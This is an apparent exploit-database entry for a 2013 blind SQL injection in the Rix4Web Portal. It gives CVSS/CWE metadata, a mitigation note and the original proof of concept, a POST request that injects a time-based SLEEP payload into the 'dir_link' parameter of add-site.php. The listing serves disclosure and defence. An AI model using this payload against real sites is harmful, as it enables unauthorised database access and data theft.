header-logo
Suggest Exploit
vendor:
Rix4Web Portal
by:
L0n3ly-H34rT
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Rix4Web Portal
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux, Windows
2013

Rix4Web Portal Remote Blind SQL Injection Vulnerability

The Rix4Web Portal is vulnerable to blind SQL injection. This can be exploited by injecting malicious SQL queries into the 'dir_link' parameter. An attacker can execute arbitrary SQL commands and retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input and use parameterized queries to prevent SQL injection attacks. It is recommended to update to a patched version of the software.
Source

Exploit-DB raw data:

################################################
### Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability
### Date: 02/23/2013 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.rix4web.com/
### Software Link: http://www.traidnt.net/vb/traidnt2230161/
### Tested on: Linux/Windows 
################################################

# AND time-based blind In POST:

POST http://127.0.0.1/rix/add-site.php?do=addnew&go=add

cat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.

# Just inject : dir_link

################################################

# Greetz To My Friendz